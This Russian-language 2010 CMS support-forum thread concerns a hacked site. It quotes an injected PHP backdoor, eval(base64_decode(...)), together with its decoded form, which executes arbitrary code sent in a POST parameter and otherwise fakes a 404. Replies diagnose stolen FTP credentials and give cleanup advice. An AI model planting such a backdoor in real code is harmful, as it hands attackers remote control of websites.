Форум

Открыть Ответить

eval base64_decode появляется в .php фаилах

0

0

1
23.03.2010 20:00:00 23.03.2010 21:02:03


Здраствуйте всем!

иза етво мои саит неработает вернея работает а в гоогле пишет атакка, что ета? и чио делатй ниодин поисковик неаткривает саит?



ето поевлиается в .php ваилах

<?php eval(base64_decode(“
aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY
29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7
”));?>

а то пример што меня непускает ни один поисковик

forum-wOFopArPo7-7885.png


PLZZZ помогите кто нибудь

Open SLAED 1.*
Сервер в интернете
bulldog1983
  • Пункты: 11
  • Регистрация: 18.03.2009
  • Пол: Мужчина
  • Из: Germany
bulldog1983
3.4

3.4

23.03.2010 20:57:34

Какие ни будь сторонние скрипты. Баннеры, рекламные коды, модули используете?
Хостер платный?
Кто ещё имеет доступ к файлам сайта кроме вас?

Складывается впечатление что кто то встроил вредоносный код в файл сайта.

Значение закодированного участка: if(isset($_POST['e']))eval(base64_decode($_POST['e']));else die('404 Not Found');


О сколько нам открытий чудных,
Готовит просвещенья дух,
И опыт, сын ошибок трудных,
И гений, парадоксов друг...
SLAED CMS
  • Группа: Клиент
  • Пункты: 38980
  • Регистрация: 30.04.2005
  • Пол: Мужчина
  • Из: Germany
SLAED CMS
3.24

3.24

23.03.2010 21:12:28 23.03.2010 21:30:46

1)доступ к файлам имею толка я
2)Хостер платный
3)рекламные коды http://www.euros4click.de


Системная информация



Open SLAED: 1.2
OS: Linux
PHP: 5.2.4-2ubuntu5.10
PHP GD: 2.0
MySQL: 5.0.51a-...
Post size: 8 MB
Upload file size: 10 MB
Memory limit: 64 MB
Execution time: 60 сек.
Mod Rewrite: Off красново цвета
Register globals: Off зелионово цвета
Safe mode: Off красново цвета
Magic quotes gpc: On зелионово цвета

ето нормално?

bulldog1983
  • Пункты: 11
  • Регистрация: 18.03.2009
  • Пол: Мужчина
  • Из: Germany
bulldog1983
3.4

3.4

23.03.2010 21:33:43 23.03.2010 21:36:10

SLAED CMS, реклама тут скорее всего не причем.

ето поевлиается в .php ваилах
<?php eval(base64_decode(“
aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY
29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7
”));?>


Рекламый код сам по себе не вживляет свой код в страницы сайта.
Тут 100 % что по ФТП прошелся бот и подвесил в код страницы свой код.
bulldog1983, случиться такое может только из-за того, что сперли пароль доступа на ФТП из-за наличия вирусов на ПК.

GRAFLEKX
  • Группа: Супермодераторы
  • Пункты: 1595
  • Регистрация: 18.09.2008
  • Пол: Мужчина
  • Из: Россия
GRAFLEKX
3.92

3.92

23.03.2010 21:42:29

кароче вчера полнастю перезалил заново опен слаед, и сделал бакуп, код пока 3 дня непоевлиаетсиа, но саит неоткривает ни один поесковик

bulldog1983
  • Пункты: 11
  • Регистрация: 18.03.2009
  • Пол: Мужчина
  • Из: Germany
bulldog1983
3.4

3.4

23.03.2010 21:54:37 23.03.2010 21:55:42

Рекомендую:

  1. Проверить свой копьютер на вирусы, трояны.
  2. Сменить пароли на ФТП, хостинг.
  3. Обновить все стандартные файлы системы, проверить ФТП директорию на присутсвие сторонних файлов, при необходимости удалить.

Если всё будет в порядке, то через несколько суток поисковики обновят информацию о вашем сайте.

О сколько нам открытий чудных,
Готовит просвещенья дух,
И опыт, сын ошибок трудных,
И гений, парадоксов друг...
SLAED CMS
  • Группа: Клиент
  • Пункты: 38980
  • Регистрация: 30.04.2005
  • Пол: Мужчина
  • Из: Germany
SLAED CMS
3.24

3.24

23.03.2010 22:04:50 23.03.2010 22:20:17

я вчера форматнул комп, буду ждать, и написал хостеру писмо... посмотрим! а если естй у ково какие идеи, то аткликнитесй plizz...

bulldog1983
  • Пункты: 11
  • Регистрация: 18.03.2009
  • Пол: Мужчина
  • Из: Germany
bulldog1983
3.4

3.4

Открыть Ответить

Хотите опробовать SLAED CMS в действии?

Идеи и предложения
Обратная связь